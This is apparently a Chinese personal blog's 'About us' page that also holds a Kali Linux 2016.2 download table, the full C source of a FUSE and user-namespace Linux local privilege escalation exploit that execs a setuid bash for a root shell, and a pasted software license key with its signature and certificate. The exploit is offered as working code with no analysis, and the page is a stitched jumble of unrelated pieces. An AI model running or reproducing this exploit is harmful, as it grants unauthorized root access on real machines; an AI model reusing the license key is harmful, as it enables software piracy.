关于我们

2年前 (2015-08-30) 1评论 已收录 7444℃

关于我们       


                                    本站创始人:  胡在领


haha

本站:首席运维工程师:钟春细        本站:高级python工程师:李超     

本站:资深网络工程师 :刘峰            本站:首席安全专家:         杨红强

       

                   

联系我们:    huzailingcn@163.com                   Kali Linux Downloads

Image Name Direct Torrent Size Version SHA1Sum
Kali Linux 64 bit ISO Torrent 2.9G 2016.2 25cc6d53a8bd8886fcb468eb4fbb4cdfac895c65
Kali Linux 32 bit ISO Torrent 2.9G 2016.2 9b4e167b0677bb0ca14099c379e0413262eefc8c
Kali Linux 64 bit Light ISO Torrent 1.1G 2016.2 f7bdc3a50f177226b3badc3d3eafcf1d59b9a5e6
Kali Linux 32 bit Light ISO Torrent 1.1G 2016.2 3b637e4543a9de7ddc709f9c1404a287c2ac62b0
Kali Linux 64 bit e17 ISO Torrent 2.7G 2016.2 4e55173207aef7ef584661810859c4700602062a
Kali Linux 64 bit Mate ISO Torrent 2.8G 2016.2 bfaeaa09dab907ce71915bcc058c1dc6424cd823
Kali Linux 64 bit Xfce ISO Torrent 2.7G 2016.2 e652ca5410a44e4dd49e120befdace38716b8980
Kali Linux 64 bit LXDE ISO Torrent 2.7G 2016.2 d8eb6e10cf0076b87abb12eecb70615ec5f5e313
Kali Linux armhf Image Torrent 0.7G 2016.2 7aec28a2aa7f303467d29d7e3cf38fd372aefe4c
Kali Linux armel Image Torrent 0.7G 2016.2 6b90d5a7f8d2627016e63caf5b895f7ca814c6c0

 

感谢你捐赠资助我们 ♥♥♥   

pay

让学习成为习惯,坚持-共享-开源-自由!


                                                                         Linux Kernel      serious  bug

 #define _GNU_SOURCE
#define FUSE_USE_VERSION 26
 #include <fuse.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <err.h>
#include <sched.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mount.h>
#include <unistd.h>
 static const char *sh_path = “/sh”;
static int sh_fd;
static loff_t sh_size;
 static int hello_getattr(const char *path, struct stat *stbuf)
{
   int res = 0;
   memset(stbuf, 0, sizeof(struct stat));
   if (strcmp(path, “/”) == 0) {
       stbuf->st_mode = S_IFDIR | 0755;
       stbuf->st_nlink = 2;
   } else if (strcmp(path, sh_path) == 0) {
       stbuf->st_mode = S_IFREG | 04755;
       stbuf->st_nlink = 1;
       stbuf->st_size = sh_size;
   } else
       res = -ENOENT;
   return res;
}
 static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
            off_t offset, struct fuse_file_info *fi)
{
   (void) offset;
   (void) fi;
   if (strcmp(path, “/”) != 0)
       return -ENOENT;
   filler(buf, “.”, NULL, 0);
   filler(buf, “..”, NULL, 0);
   filler(buf, sh_path + 1, NULL, 0);
   return 0;
}
 static int hello_open(const char *path, struct fuse_file_info *fi)
{
   if (strcmp(path, sh_path) != 0)
       return -ENOENT;
   if ((fi->flags & 3) != O_RDONLY)
       return -EACCES;
   return 0;
}
static int hello_read(const char *path, char *buf, size_t size, off_t offset,
             struct fuse_file_info *fi)
{
   (void) fi;
   if (strcmp(path, sh_path) != 0)
       return -ENOENT;
  return pread(sh_fd, buf, size, offset);
}
 static struct fuse_operations hello_oper = {
   .getattr    = hello_getattr,
   .readdir    = hello_readdir,
   .open        = hello_open,
   .read        = hello_read,
};
 static int evilfd = -1;
 static int child2(void *mnt_void)
{
   const char *mountpoint = mnt_void;
   int fd2;
   if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)
       err(1, “unshare”);
   if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)
       err(1, “mount”);
   fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);
   if (fd2 == -1)
       err(1, “open”);
   if (dup3(fd2, evilfd, O_CLOEXEC) == -1)
       err(1, “dup3″);
   close(fd2);
   printf(“Mount hackery seems to have worked.\n”);
   exit(0);
}
static int child1(const char *mountpoint)
{
   char child2stack[2048];
   char evil_path[1024];
    evilfd = dup(0);
   if (evilfd == -1)
       err(1, “dup”);
   if (clone(child2, child2stack,
         CLONE_FILES | CLONE_VFORK,
         (void *)mountpoint) == -1)
       err(1, “clone”);
   printf(“Here goes…\n”);
    sprintf(evil_path, “/proc/self/fd/%d/sh”, evilfd);
  execl(evil_path, “sh”, “-p”, NULL);
   perror(evil_path);
   return 1;
}
 static int fuse_main_suid(int argc, char *argv[],
             const struct fuse_operations *op,
             void *user_data)
{
   struct fuse *fuse;
   char *mountpoint;
   int multithreaded;
   int res;
   if (argc != 2) {
       printf(“Usage: fuse_suid <mountpoint>\n”);
       return -EINVAL;
   }
   char *args[] = {“fuse_suid”, “-f”, “–“, argv[1], NULL};
   fuse = fuse_setup(sizeof(args)/sizeof(args[0]) – 1, args,
             op, sizeof(*op), &mountpoint,
             &multithreaded, user_data);
   if (fuse == NULL)
       return 1;
   printf(“FUSE initialized.  Time to have some fun…\n”);
   printf(“Warning: this exploit hangs on exit.  Hit Ctrl-C when done.\n”);
   if (fork() == 0)
       _exit(child1(mountpoint));
   if (multithreaded)
       res = fuse_loop_mt(fuse);
   else
       res = fuse_loop(fuse);
   fuse_teardown(fuse, mountpoint);
   if (res == -1)
       return 1;
   return 0;
}
 int main(int argc, char *argv[])
{
   sh_fd = open(“/bin/bash”, O_RDONLY);
   if (sh_fd == -1)
       err(1, “sh”);
   sh_size = lseek(sh_fd, 0, SEEK_END);
   return fuse_main_suid(argc, argv, &hello_oper, NULL);
}
##############################################
EP4FLA7TD3-eyJsaWNlbnNlSWQiOiJFUDRGTEE3VEQzIiwibGljZW5zZWVOYW1lIjoiU2lsZW5jZSBDb2RlciIsImFzc2lnbmVlTmFtZSI6IiIsImFzc2lnbmVlRW1haWwiOiIiLCJsaWNlbnNlUmVzdHJpY3Rpb24iOiJGb3IgZWR1Y2F0aW9uYWwgdXNlIG9ubHkiLCJjaGVja0NvbmN1cnJlbnRVc2UiOmZhbHNlLCJwcm9kdWN0cyI6W3siY29kZSI6IkFDIiwicGFpZFVwVG8iOiIyMDE4LTAxLTI0In0seyJjb2RlIjoiRE0iLCJwYWlkVXBUbyI6IjIwMTgtMDEtMjQifSx7ImNvZGUiOiJJSSIsInBhaWRVcFRvIjoiMjAxOC0wMS0yNCJ9LHsiY29kZSI6IlJTMCIsInBhaWRVcFRvIjoiMjAxOC0wMS0yNCJ9LHsiY29kZSI6IldTIiwicGFpZFVwVG8iOiIyMDE4LTAxLTI0In0seyJjb2RlIjoiRFBOIiwicGFpZFVwVG8iOiIyMDE4LTAxLTI0In0seyJjb2RlIjoiUkMiLCJwYWlkVXBUbyI6IjIwMTgtMDEtMjQifSx7ImNvZGUiOiJQUyIsInBhaWRVcFRvIjoiMjAxOC0wMS0yNCJ9LHsiY29kZSI6IkRDIiwicGFpZFVwVG8iOiIyMDE4LTAxLTI0In0seyJjb2RlIjoiREIiLCJwYWlkVXBUbyI6IjIwMTgtMDEtMjQifSx7ImNvZGUiOiJSTSIsInBhaWRVcFRvIjoiMjAxOC0wMS0yNCJ9LHsiY29kZSI6IlBDIiwicGFpZFVwVG8iOiIyMDE4LTAxLTI0In0seyJjb2RlIjoiQ0wiLCJwYWlkVXBUbyI6IjIwMTgtMDEtMjQifV0sImhhc2giOiI1MTYwMzAwLzAiLCJncmFjZVBlcmlvZERheXMiOjAsImF1dG9Qcm9sb25nYXRlZCI6ZmFsc2UsImlzQXV0b1Byb2xvbmdhdGVkIjpmYWxzZX0=-NJrC6G7LFhNElFks9KVyQ+omHIVlkOc0qLXffJMlDjLYUm8n+k8buhvTH8gN+PivrgHt5QWDHu3JXhFBYgKRaw3yX+BO2BkWr1HMJPSPZcVcNkO6oimSiPUTd2dC8nbPwZCw+8OwzGrtcddxFCYJLTE7hZOZUXlWRxYK7jb/3BE2j8AiT3SmeUnbZYwnqE7t/YFdJ4ZTXnx5gNXqjw4HCoRLPxTmpPFulIEEB9nbN8g6NzXCCIM1Qz+J3Pr7H3ED6F2f7/29gunRyX+r6kxe8Zza6rrrd5+zxQM8s9hC+jTvQaxwzyJwa6HT6g816B3CgGYmUmUbAqrgRjsX6v5rUA==-MIIEPjCCAiagAwIBAgIBBTANBgkqhkiG9w0BAQsFADAYMRYwFAYDVQQDDA1KZXRQcm9maWxlIENBMB4XDTE1MTEwMjA4MjE0OFoXDTE4MTEwMTA4MjE0OFowETEPMA0GA1UEAwwGcHJvZDN5MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxcQkq+zdxlR2mmRYBPzGbUNdMN6OaXiXzxIWtMEkrJMO/5oUfQJbLLuMSMK0QHFmaI37WShyxZcfRCidwXjot4zmNBKnlyHodDij/78TmVqFl8nOeD5+07B8VEaIu7c3E1N+e1doC6wht4I4+IEmtsPAdoaj5WCQVQbrI8KeT8M9VcBIWX7fD0fhexfg3ZRt0xqwMcXGNp3DdJHiO0rCdU+Itv7EmtnSVq9jBG1usMSFvMowR25mju2JcPFp1+I4ZI+FqgR8gyG8oiNDyNEoAbsR3lOpI7grUYSvkB/xVy/VoklPCK2h0f0GJxFjnye8NT1PAywoyl7RmiAVRE/EKwIDAQABo4GZMIGWMAkGA1UdEwQCMAAwHQYDVR0OBBYEFGEpG9oZGcfLMGNBkY7SgHiMGgTcMEgGA1UdIwRBMD+AFKOetkhnQhI2Qb1t4Lm0oFKLl/GzoRykGjAYMRYwFAYDVQQDDA1KZXRQcm9maWxlIENBggkA0myxg7KDeeEwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgWgMA0GCSqGSIb3DQEBCwUAA4ICAQC9WZuYgQedSuOc5TOUSrRigMw4/+wuC5EtZBfvdl4HT/8vzMW/oUlIP4YCvA0XKyBaCJ2iX+ZCDKoPfiYXiaSiH+HxAPV6J79vvouxKrWg2XV6ShFtPLP+0gPdGq3x9R3+kJbmAm8w+FOdlWqAfJrLvpzMGNeDU14YGXiZ9bVzmIQbwrBA+c/F4tlK/DV07dsNExihqFoibnqDiVNTGombaU2dDup2gwKdL81ua8EIcGNExHe82kjF4zwfadHk3bQVvbfdAwxcDy4xBjs3L4raPLU3yenSzr/OEur1+jfOxnQSmEcMXKXgrAQ9U55gwjcOFKrgOxEdek/Sk1VfOjvS+nuM4eyEruFMfaZHzoQiuw4IqgGc45ohFH0UUyjYcuFxxDSU9lMCv8qdHKm+wnPRb0l9l5vXsCBDuhAGYD6ss+Ga+aDY6f/qXZuUCEUOH3QUNbbCUlviSz6+GiRnt1kA9N2Qachl+2yBfaqUqr8h7Z2gsx5LcIf5kYNsqJ0GavXTVyWh7PYiKX4bs354ZQLUwwa/cG++2+wNWP+HtBhVxMRNTdVhSm38AknZlD+PTAsWGu9GyLmhti2EnVwGybSD2Dxmhxk3IPCkhKAK+pl0eWYGZWG3tJ9mZ7SowcXLWDFAk0lRJnKGFMTggrWjV8GYpw5bq23VmIqqDLgkNzuoog==

 

博主

让学习成为习惯,坚持-共享-开源-自由! 成功者决不放弃,放弃者绝不成功!

1 条评论

  1. avatar
    -49#

    ?

    admin 于2016-10-28 上午12:38 评论 回复